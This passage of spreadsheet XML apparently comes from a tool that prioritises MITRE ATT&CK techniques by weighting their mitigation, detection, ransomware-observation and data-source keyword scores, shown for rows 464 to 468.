        <f>IF(AF464="1",'TOP 10 TECHNIQUES'!C$16,0)</f>
        <v>0</v>
      </c>
      <c r="AH464" s="25" t="str" cm="1">
        <f t="array" ref="AH464">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"File","Group","Logon","Schedule","User","Registry","Active","Application"},AC464)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AI464" s="25">
        <f>IF(AH464="1",'TOP 10 TECHNIQUES'!C$17,0)</f>
        <v>0</v>
      </c>
      <c r="AJ464" s="25" t="str" cm="1">
        <f t="array" ref="AJ464">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Cloud","Cluster","Container","Image","Instance","Pod","Snapshot","Volume"},AC464)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AK464" s="25">
        <f>IF(AJ464="1",'TOP 10 TECHNIQUES'!C$18,0)</f>
        <v>0</v>
      </c>
      <c r="AL464" s="25" t="str" cm="1">
        <f t="array" ref="AL464">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Drive","Firmware","Host","Kernel"},AC464)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AM464" s="25">
        <f>IF(AL464="1",'TOP 10 TECHNIQUES'!C$19,0)</f>
        <v>0</v>
      </c>
      <c r="AN464" s="52">
        <v>0</v>
      </c>
      <c r="AO464" s="51">
        <v>0</v>
      </c>
      <c r="AP464" s="25">
        <f>parameters!$J$21*Table1[[#This Row],[TAT Utility]]+parameters!$J$22*Table1[[#This Row],[Count Utility]]</f>
        <v>1.255047619047619E-2</v>
      </c>
      <c r="AQ464" s="25">
        <f>(Table1[[#This Row],[Total Top Att&amp;ck Score ]]-parameters!$D$19)/(parameters!$D$20-parameters!$D$19)</f>
        <v>4.1834920634920635E-2</v>
      </c>
      <c r="AR464" s="25">
        <f>IF(Table1[[#This Row],[TAT Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[TAT Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[TAT Utility (unclipped)]]) )</f>
        <v>4.1834920634920635E-2</v>
      </c>
      <c r="AS464" s="25">
        <f>(Table1[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]-parameters!$D$21)/(parameters!$D$22-parameters!$D$21)</f>
        <v>0</v>
      </c>
      <c r="AT464" s="25">
        <f>IF(Table1[[#This Row],[Count Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Count Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Count Utility (unclipped)]]) )</f>
        <v>0</v>
      </c>
      <c r="AU46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65" spans="1:47" ht="32.1">
      <c r="A465" s="25">
        <f>parameters!$J$21*Table1[[#This Row],[TAT Utility]]+parameters!$J$22*Table1[[#This Row],[Count Utility]]</f>
        <v>3.8809523809523808E-2</v>
      </c>
      <c r="B465" s="25">
        <f>SUM(H465,M465,V465)*(1+SUM(AE465,AG465,AI465,AK465,AM465))</f>
        <v>5.4761904761904762E-2</v>
      </c>
      <c r="C465" s="25" t="s">
        <v>1703</v>
      </c>
      <c r="D465" s="25" t="s">
        <v>1704</v>
      </c>
      <c r="E465" s="25" t="s">
        <v>89</v>
      </c>
      <c r="F465" s="51">
        <v>0</v>
      </c>
      <c r="G465" s="51">
        <v>1</v>
      </c>
      <c r="H465" s="25">
        <f>parameters!$J$10*Table1[[#This Row],[Before Utility]]+parameters!$J$11*Table1[[#This Row],[After Utility]]</f>
        <v>0.05</v>
      </c>
      <c r="I465">
        <f>(Table1[[#This Row],[Num. TID Before]]-parameters!$D$8)/(parameters!$D$9-parameters!$D$8)</f>
        <v>0</v>
      </c>
      <c r="J465">
        <f>IF(Table1[[#This Row],[Before Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Before Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Before Utility (unclipped)]]))</f>
        <v>0</v>
      </c>
      <c r="K465">
        <f>(Table1[[#This Row],[Num. TID After]]-parameters!$D$10)/(parameters!$D$11-parameters!$D$10)</f>
        <v>0.1</v>
      </c>
      <c r="L465">
        <f>IF(Table1[[#This Row],[After Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[After Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[After Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="M465" s="25">
        <v>0</v>
      </c>
      <c r="N465" s="51">
        <v>0</v>
      </c>
      <c r="O465" s="51">
        <v>0</v>
      </c>
      <c r="P465" s="51">
        <v>0</v>
      </c>
      <c r="Q465" s="51">
        <v>1</v>
      </c>
      <c r="R465" s="51"/>
      <c r="S465" s="51">
        <v>0</v>
      </c>
      <c r="T465" s="51"/>
      <c r="U465" s="51">
        <v>0</v>
      </c>
      <c r="V465" s="25">
        <f>parameters!$J$4*Table1[[#This Row],[Mitigations Utility]] + parameters!$J$5*Table1[[#This Row],[Detections Utility]]</f>
        <v>4.7619047619047615E-3</v>
      </c>
      <c r="W465">
        <f>SUM(Table1[[#This Row],[Num. 800-53 (r5)]],Table1[[#This Row],[Num. CIS Controls]])</f>
        <v>0</v>
      </c>
      <c r="X465">
        <f>(Table1[[#This Row],[Total Mitigations]]-parameters!$D$2)/(parameters!$D$3-parameters!$D$2)</f>
        <v>0</v>
      </c>
      <c r="Y465">
        <f>IF(Table1[[#This Row],[Mitigations Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Mitigations Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Mitigations Utility (unclipped)]]) )</f>
        <v>0</v>
      </c>
      <c r="Z465">
        <f>SUM(Table1[[#This Row],[Num. CAR]:[Num. Splunk]])</f>
        <v>1</v>
      </c>
      <c r="AA465">
        <f>(Table1[[#This Row],[Total Detections]]-parameters!$D$4)/(parameters!$D$5-parameters!$D$4)</f>
        <v>0.01</v>
      </c>
      <c r="AB465">
        <f>IF(Table1[[#This Row],[Detections Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Detections Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Detections Utility (unclipped)]]) )</f>
        <v>0.01</v>
      </c>
      <c r="AC465" s="29" t="s">
        <v>1705</v>
      </c>
      <c r="AD465" s="25" t="str" cm="1">
        <f t="array" ref="AD465">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Process","Command","Script","WMI","Module","Pipe","Service"},AC465)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AE465" s="25">
        <f>IF(AD465="1",'TOP 10 TECHNIQUES'!C$15,0)</f>
        <v>0</v>
      </c>
      <c r="AF465" s="25" t="str" cm="1">
        <f t="array" ref="AF465">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Network","Firewall"},AC465)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AG465" s="25">
        <f>IF(AF465="1",'TOP 10 TECHNIQUES'!C$16,0)</f>
        <v>0</v>
      </c>
      <c r="AH465" s="25" t="str" cm="1">
        <f t="array" ref="AH465">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"File","Group","Logon","Schedule","User","Registry","Active","Application"},AC465)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AI465" s="25">
        <f>IF(AH465="1",'TOP 10 TECHNIQUES'!C$17,0)</f>
        <v>0</v>
      </c>
      <c r="AJ465" s="25" t="str" cm="1">
        <f t="array" ref="AJ465">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Cloud","Cluster","Container","Image","Instance","Pod","Snapshot","Volume"},AC465)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AK465" s="25">
        <f>IF(AJ465="1",'TOP 10 TECHNIQUES'!C$18,0)</f>
        <v>0</v>
      </c>
      <c r="AL465" s="25" t="str" cm="1">
        <f t="array" ref="AL465">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Drive","Firmware","Host","Kernel"},AC465)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AM465" s="25">
        <f>IF(AL465="1",'TOP 10 TECHNIQUES'!C$19,0)</f>
        <v>0</v>
      </c>
      <c r="AN465" s="52">
        <v>1</v>
      </c>
      <c r="AO465" s="51">
        <v>1</v>
      </c>
      <c r="AP465" s="25">
        <f>parameters!$J$21*Table1[[#This Row],[TAT Utility]]+parameters!$J$22*Table1[[#This Row],[Count Utility]]</f>
        <v>3.8809523809523808E-2</v>
      </c>
      <c r="AQ465" s="25">
        <f>(Table1[[#This Row],[Total Top Att&amp;ck Score ]]-parameters!$D$19)/(parameters!$D$20-parameters!$D$19)</f>
        <v>1.8253968253968255E-2</v>
      </c>
      <c r="AR465" s="25">
        <f>IF(Table1[[#This Row],[TAT Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[TAT Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[TAT Utility (unclipped)]]) )</f>
        <v>1.8253968253968255E-2</v>
      </c>
      <c r="AS465" s="25">
        <f>(Table1[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]-parameters!$D$21)/(parameters!$D$22-parameters!$D$21)</f>
        <v>4.7619047619047616E-2</v>
      </c>
      <c r="AT465" s="25">
        <f>IF(Table1[[#This Row],[Count Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Count Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Count Utility (unclipped)]]) )</f>
        <v>4.7619047619047616E-2</v>
      </c>
      <c r="AU46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66" spans="1:47">
      <c r="A466" s="25">
        <f>parameters!$J$21*Table1[[#This Row],[TAT Utility]]+parameters!$J$22*Table1[[#This Row],[Count Utility]]</f>
        <v>3.8809523809523808E-2</v>
      </c>
      <c r="B466" s="25">
        <f>SUM(H466,M466,V466)*(1+SUM(AE466,AG466,AI466,AK466,AM466))</f>
        <v>5.4761904761904762E-2</v>
      </c>
      <c r="C466" s="25" t="s">
        <v>1706</v>
      </c>
      <c r="D466" s="25" t="s">
        <v>1663</v>
      </c>
      <c r="E466" s="25" t="s">
        <v>1627</v>
      </c>
      <c r="F466" s="51">
        <v>0</v>
      </c>
      <c r="G466" s="51">
        <v>1</v>
      </c>
      <c r="H466" s="25">
        <f>parameters!$J$10*Table1[[#This Row],[Before Utility]]+parameters!$J$11*Table1[[#This Row],[After Utility]]</f>
        <v>0.05</v>
      </c>
      <c r="I466">
        <f>(Table1[[#This Row],[Num. TID Before]]-parameters!$D$8)/(parameters!$D$9-parameters!$D$8)</f>
        <v>0</v>
      </c>
      <c r="J466">
        <f>IF(Table1[[#This Row],[Before Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Before Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Before Utility (unclipped)]]))</f>
        <v>0</v>
      </c>
      <c r="K466">
        <f>(Table1[[#This Row],[Num. TID After]]-parameters!$D$10)/(parameters!$D$11-parameters!$D$10)</f>
        <v>0.1</v>
      </c>
      <c r="L466">
        <f>IF(Table1[[#This Row],[After Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[After Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[After Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="M466" s="25">
        <v>0</v>
      </c>
      <c r="N466" s="51">
        <v>0</v>
      </c>
      <c r="O466" s="51">
        <v>1</v>
      </c>
      <c r="P466" s="51">
        <v>0</v>
      </c>
      <c r="Q466" s="51">
        <v>0</v>
      </c>
      <c r="R466" s="51"/>
      <c r="S466" s="51">
        <v>0</v>
      </c>
      <c r="T466" s="51"/>
      <c r="U466" s="51">
        <v>0</v>
      </c>
      <c r="V466" s="25">
        <f>parameters!$J$4*Table1[[#This Row],[Mitigations Utility]] + parameters!$J$5*Table1[[#This Row],[Detections Utility]]</f>
        <v>4.7619047619047615E-3</v>
      </c>
      <c r="W466">
        <f>SUM(Table1[[#This Row],[Num. 800-53 (r5)]],Table1[[#This Row],[Num. CIS Controls]])</f>
        <v>0</v>
      </c>
      <c r="X466">
        <f>(Table1[[#This Row],[Total Mitigations]]-parameters!$D$2)/(parameters!$D$3-parameters!$D$2)</f>
        <v>0</v>
      </c>
      <c r="Y466">
        <f>IF(Table1[[#This Row],[Mitigations Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Mitigations Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Mitigations Utility (unclipped)]]) )</f>
        <v>0</v>
      </c>
      <c r="Z466">
        <f>SUM(Table1[[#This Row],[Num. CAR]:[Num. Splunk]])</f>
        <v>1</v>
      </c>
      <c r="AA466">
        <f>(Table1[[#This Row],[Total Detections]]-parameters!$D$4)/(parameters!$D$5-parameters!$D$4)</f>
        <v>0.01</v>
      </c>
      <c r="AB466">
        <f>IF(Table1[[#This Row],[Detections Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Detections Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Detections Utility (unclipped)]]) )</f>
        <v>0.01</v>
      </c>
      <c r="AC466" s="29"/>
      <c r="AD466" s="25" t="str" cm="1">
        <f t="array" ref="AD466">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Process","Command","Script","WMI","Module","Pipe","Service"},AC466)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AE466" s="25">
        <f>IF(AD466="1",'TOP 10 TECHNIQUES'!C$15,0)</f>
        <v>0</v>
      </c>
      <c r="AF466" s="25" t="str" cm="1">
        <f t="array" ref="AF466">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Network","Firewall"},AC466)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AG466" s="25">
        <f>IF(AF466="1",'TOP 10 TECHNIQUES'!C$16,0)</f>
        <v>0</v>
      </c>
      <c r="AH466" s="25" t="str" cm="1">
        <f t="array" ref="AH466">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"File","Group","Logon","Schedule","User","Registry","Active","Application"},AC466)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AI466" s="25">
        <f>IF(AH466="1",'TOP 10 TECHNIQUES'!C$17,0)</f>
        <v>0</v>
      </c>
      <c r="AJ466" s="25" t="str" cm="1">
        <f t="array" ref="AJ466">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Cloud","Cluster","Container","Image","Instance","Pod","Snapshot","Volume"},AC466)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AK466" s="25">
        <f>IF(AJ466="1",'TOP 10 TECHNIQUES'!C$18,0)</f>
        <v>0</v>
      </c>
      <c r="AL466" s="25" t="str" cm="1">
        <f t="array" ref="AL466">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Drive","Firmware","Host","Kernel"},AC466)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AM466" s="25">
        <f>IF(AL466="1",'TOP 10 TECHNIQUES'!C$19,0)</f>
        <v>0</v>
      </c>
      <c r="AN466" s="52">
        <v>1</v>
      </c>
      <c r="AO466" s="51">
        <v>1</v>
      </c>
      <c r="AP466" s="25">
        <f>parameters!$J$21*Table1[[#This Row],[TAT Utility]]+parameters!$J$22*Table1[[#This Row],[Count Utility]]</f>
        <v>3.8809523809523808E-2</v>
      </c>
      <c r="AQ466" s="25">
        <f>(Table1[[#This Row],[Total Top Att&amp;ck Score ]]-parameters!$D$19)/(parameters!$D$20-parameters!$D$19)</f>
        <v>1.8253968253968255E-2</v>
      </c>
      <c r="AR466" s="25">
        <f>IF(Table1[[#This Row],[TAT Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[TAT Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[TAT Utility (unclipped)]]) )</f>
        <v>1.8253968253968255E-2</v>
      </c>
      <c r="AS466" s="25">
        <f>(Table1[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]-parameters!$D$21)/(parameters!$D$22-parameters!$D$21)</f>
        <v>4.7619047619047616E-2</v>
      </c>
      <c r="AT466" s="25">
        <f>IF(Table1[[#This Row],[Count Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Count Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Count Utility (unclipped)]]) )</f>
        <v>4.7619047619047616E-2</v>
      </c>
      <c r="AU46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67" spans="1:47">
      <c r="A467" s="25">
        <f>parameters!$J$21*Table1[[#This Row],[TAT Utility]]+parameters!$J$22*Table1[[#This Row],[Count Utility]]</f>
        <v>3.8809523809523808E-2</v>
      </c>
      <c r="B467" s="25">
        <f>SUM(H467,M467,V467)*(1+SUM(AE467,AG467,AI467,AK467,AM467))</f>
        <v>5.4761904761904762E-2</v>
      </c>
      <c r="C467" s="25" t="s">
        <v>1707</v>
      </c>
      <c r="D467" s="25" t="s">
        <v>1708</v>
      </c>
      <c r="E467" s="25" t="s">
        <v>1709</v>
      </c>
      <c r="F467" s="51">
        <v>0</v>
      </c>
      <c r="G467" s="51">
        <v>1</v>
      </c>
      <c r="H467" s="25">
        <f>parameters!$J$10*Table1[[#This Row],[Before Utility]]+parameters!$J$11*Table1[[#This Row],[After Utility]]</f>
        <v>0.05</v>
      </c>
      <c r="I467">
        <f>(Table1[[#This Row],[Num. TID Before]]-parameters!$D$8)/(parameters!$D$9-parameters!$D$8)</f>
        <v>0</v>
      </c>
      <c r="J467">
        <f>IF(Table1[[#This Row],[Before Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Before Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Before Utility (unclipped)]]))</f>
        <v>0</v>
      </c>
      <c r="K467">
        <f>(Table1[[#This Row],[Num. TID After]]-parameters!$D$10)/(parameters!$D$11-parameters!$D$10)</f>
        <v>0.1</v>
      </c>
      <c r="L467">
        <f>IF(Table1[[#This Row],[After Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[After Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[After Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="M467" s="25">
        <v>0</v>
      </c>
      <c r="N467" s="51">
        <v>0</v>
      </c>
      <c r="O467" s="51">
        <v>0</v>
      </c>
      <c r="P467" s="51">
        <v>0</v>
      </c>
      <c r="Q467" s="51">
        <v>1</v>
      </c>
      <c r="R467" s="51"/>
      <c r="S467" s="51">
        <v>0</v>
      </c>
      <c r="T467" s="51"/>
      <c r="U467" s="51">
        <v>0</v>
      </c>
      <c r="V467" s="25">
        <f>parameters!$J$4*Table1[[#This Row],[Mitigations Utility]] + parameters!$J$5*Table1[[#This Row],[Detections Utility]]</f>
        <v>4.7619047619047615E-3</v>
      </c>
      <c r="W467">
        <f>SUM(Table1[[#This Row],[Num. 800-53 (r5)]],Table1[[#This Row],[Num. CIS Controls]])</f>
        <v>0</v>
      </c>
      <c r="X467">
        <f>(Table1[[#This Row],[Total Mitigations]]-parameters!$D$2)/(parameters!$D$3-parameters!$D$2)</f>
        <v>0</v>
      </c>
      <c r="Y467">
        <f>IF(Table1[[#This Row],[Mitigations Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Mitigations Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Mitigations Utility (unclipped)]]) )</f>
        <v>0</v>
      </c>
      <c r="Z467">
        <f>SUM(Table1[[#This Row],[Num. CAR]:[Num. Splunk]])</f>
        <v>1</v>
      </c>
      <c r="AA467">
        <f>(Table1[[#This Row],[Total Detections]]-parameters!$D$4)/(parameters!$D$5-parameters!$D$4)</f>
        <v>0.01</v>
      </c>
      <c r="AB467">
        <f>IF(Table1[[#This Row],[Detections Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Detections Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Detections Utility (unclipped)]]) )</f>
        <v>0.01</v>
      </c>
      <c r="AC467" s="29"/>
      <c r="AD467" s="25" t="str" cm="1">
        <f t="array" ref="AD467">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Process","Command","Script","WMI","Module","Pipe","Service"},AC467)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AE467" s="25">
        <f>IF(AD467="1",'TOP 10 TECHNIQUES'!C$15,0)</f>
        <v>0</v>
      </c>
      <c r="AF467" s="25" t="str" cm="1">
        <f t="array" ref="AF467">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Network","Firewall"},AC467)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AG467" s="25">
        <f>IF(AF467="1",'TOP 10 TECHNIQUES'!C$16,0)</f>
        <v>0</v>
      </c>
      <c r="AH467" s="25" t="str" cm="1">
        <f t="array" ref="AH467">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"File","Group","Logon","Schedule","User","Registry","Active","Application"},AC467)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AI467" s="25">
        <f>IF(AH467="1",'TOP 10 TECHNIQUES'!C$17,0)</f>
        <v>0</v>
      </c>
      <c r="AJ467" s="25" t="str" cm="1">
        <f t="array" ref="AJ467">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Cloud","Cluster","Container","Image","Instance","Pod","Snapshot","Volume"},AC467)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AK467" s="25">
        <f>IF(AJ467="1",'TOP 10 TECHNIQUES'!C$18,0)</f>
        <v>0</v>
      </c>
      <c r="AL467" s="25" t="str" cm="1">
        <f t="array" ref="AL467">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Drive","Firmware","Host","Kernel"},AC467)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AM467" s="25">
        <f>IF(AL467="1",'TOP 10 TECHNIQUES'!C$19,0)</f>
        <v>0</v>
      </c>
      <c r="AN467" s="60">
        <v>1</v>
      </c>
      <c r="AO467" s="51">
        <v>1</v>
      </c>
      <c r="AP467" s="25">
        <f>parameters!$J$21*Table1[[#This Row],[TAT Utility]]+parameters!$J$22*Table1[[#This Row],[Count Utility]]</f>
        <v>3.8809523809523808E-2</v>
      </c>
      <c r="AQ467" s="25">
        <f>(Table1[[#This Row],[Total Top Att&amp;ck Score ]]-parameters!$D$19)/(parameters!$D$20-parameters!$D$19)</f>
        <v>1.8253968253968255E-2</v>
      </c>
      <c r="AR467" s="25">
        <f>IF(Table1[[#This Row],[TAT Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[TAT Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[TAT Utility (unclipped)]]) )</f>
        <v>1.8253968253968255E-2</v>
      </c>
      <c r="AS467" s="25">
        <f>(Table1[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]-parameters!$D$21)/(parameters!$D$22-parameters!$D$21)</f>
        <v>4.7619047619047616E-2</v>
      </c>
      <c r="AT467" s="25">
        <f>IF(Table1[[#This Row],[Count Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Count Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Count Utility (unclipped)]]) )</f>
        <v>4.7619047619047616E-2</v>
      </c>
      <c r="AU46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68" spans="1:47">
      <c r="A468" s="25">
        <f>parameters!$J$21*Table1[[#This Row],[TAT Utility]]+parameters!$J$22*Table1[[#This Row],[Count Utility]]</f>
        <v>5.4761904761904765E-3</v>
      </c>
      <c r="B468" s="25">
        <f>SUM(H468,M468,V468)*(1+SUM(AE468,AG468,AI468,AK468,AM468))</f>
        <v>5.4761904761904762E-2</v>
      </c>
      <c r="C468" s="25" t="s">
        <v>1710</v>
      </c>
      <c r="D468" s="25" t="s">
        <v>1708</v>
      </c>
      <c r="E468" s="25" t="s">
        <v>89</v>
      </c>
      <c r="F468" s="51">
        <v>0</v>
      </c>
      <c r="G468" s="51">
        <v>1</v>
      </c>
      <c r="H468" s="35">
        <f>parameters!$J$10*Table1[[#This Row],[Before Utility]]+parameters!$J$11*Table1[[#This Row],[After Utility]]</f>
        <v>0.05</v>
      </c>
      <c r="I468">
        <f>(Table1[[#This Row],[Num. TID Before]]-parameters!$D$8)/(parameters!$D$9-parameters!$D$8)</f>
        <v>0</v>
      </c>
      <c r="J468">
        <f>IF(Table1[[#This Row],[Before Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Before Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Before Utility (unclipped)]]))</f>
        <v>0</v>
      </c>
      <c r="K468">
        <f>(Table1[[#This Row],[Num. TID After]]-parameters!$D$10)/(parameters!$D$11-parameters!$D$10)</f>
        <v>0.1</v>
      </c>
      <c r="L468">
        <f>IF(Table1[[#This Row],[After Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[After Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[After Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="M468" s="25">
        <v>0</v>
      </c>
      <c r="N468" s="51">
        <v>0</v>
      </c>
      <c r="O468" s="51">
        <v>1</v>
      </c>
      <c r="P468" s="51">
        <v>0</v>
      </c>
      <c r="Q468" s="51">
        <v>0</v>
      </c>
      <c r="R468" s="51"/>
      <c r="S468" s="51">
        <v>0</v>
      </c>
      <c r="T468" s="51"/>
      <c r="U468" s="51">
        <v>0</v>
      </c>
      <c r="V468" s="25">
        <f>parameters!$J$4*Table1[[#This Row],[Mitigations Utility]] + parameters!$J$5*Table1[[#This Row],[Detections Utility]]</f>
        <v>4.7619047619047615E-3</v>
      </c>
      <c r="W468">
        <f>SUM(Table1[[#This Row],[Num. 800-53 (r5)]],Table1[[#This Row],[Num. CIS Controls]])</f>
        <v>0</v>
      </c>
      <c r="X468">
        <f>(Table1[[#This Row],[Total Mitigations]]-parameters!$D$2)/(parameters!$D$3-parameters!$D$2)</f>
        <v>0</v>
      </c>
      <c r="Y468">
        <f>IF(Table1[[#This Row],[Mitigations Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Mitigations Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Mitigations Utility (unclipped)]]) )</f>
        <v>0</v>
      </c>
      <c r="Z468">
        <f>SUM(Table1[[#This Row],[Num. CAR]:[Num. Splunk]])</f>
        <v>1</v>
      </c>
      <c r="AA468">
        <f>(Table1[[#This Row],[Total Detections]]-parameters!$D$4)/(parameters!$D$5-parameters!$D$4)</f>
        <v>0.01</v>
      </c>
      <c r="AB468">
        <f>IF(Table1[[#This Row],[Detections Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Detections Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Detections Utility (unclipped)]]) )</f>
        <v>0.01</v>
      </c>
      <c r="AC468" s="29"/>
      <c r="AD468" s="25" t="str" cm="1">
        <f t="array" ref="AD468">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Process","Command","Script","WMI","Module","Pipe","Service"},AC468)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AE468" s="25">
        <f>IF(AD468="1",'TOP 10 TECHNIQUES'!C$15,0)</f>
        <v>0</v>
      </c>
      <c r="AF468" s="25" t="str" cm="1">
        <f t="array" ref="AF468">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Network","Firewall"},AC468)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AG468" s="25">
        <f>IF(AF468="1",'TOP 10 TECHNIQUES'!C$16,0)</f>
        <v>0</v>
      </c>
      <c r="AH468" s="25" t="str" cm="1">
        <f t="array" ref="AH468">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"File","Group","Logon","Schedule","User","Registry","Active","Application"},AC468)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AI468" s="25">
        <f>IF(AH468="1",'TOP 10 TECHNIQUES'!C$17,0)</f>
        <v>0</v>
      </c>
      <c r="AJ468" s="25" t="str" cm="1">
        <f t="array" ref="AJ468">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Cloud","Cluster","Container","Image","Instance","Pod","Snapshot","Volume"},AC468)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AK468" s="25">
        <f>IF(AJ468="1",'TOP 10 TECHNIQUES'!C$18,0)</f>
        <v>0</v>
      </c>
      <c r="AL468" s="25" t="str" cm="1">
        <f t="array" ref="AL468">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Drive","Firmware","Host","Kernel"},AC468)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AM468" s="25">
        <f>IF(AL468="1",'TOP 10 TECHNIQUES'!C$19,0)</f>
        <v>0</v>
      </c>
      <c r="AN468" s="52">
        <v>0</v>
      </c>
      <c r="AO468" s="51">
        <v>0</v>
      </c>
      <c r="AP468" s="25">
        <f>parameters!$J$21*Table1[[#This Row],[TAT Utility]]+parameters!$J$22*Table1[[#This Row],[Count Utility]]</f>
        <v>5.4761904761904765E-3</v>
      </c>
      <c r="AQ468" s="25">
        <f>(Table1[[#This Row],[Total Top Att&amp;ck Score ]]-parameters!$D$19)/(parameters!$D$20-parameters!$D$19)</f>
        <v>1.8253968253968255E-2</v>
      </c>
      <c r="AR468" s="25">
        <f>IF(Table1[[#This Row],[TAT Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[TAT Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[TAT Utility (unclipped)]]) )</f>
        <v>1.8253968253968255E-2</v>
      </c>
      <c r="AS468" s="25">
        <f>(Table1[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]-parameters!$D$21)/(parameters!$D$22-parameters!$D$21)</f>
        <v>0</v>
      </c>
      <c r="AT468" s="25">
        <f>IF(Table1[[#This Row],[Count Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Count Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Count Utility (unclipped)]]) )</f>
        <v>0</v>
      </c>
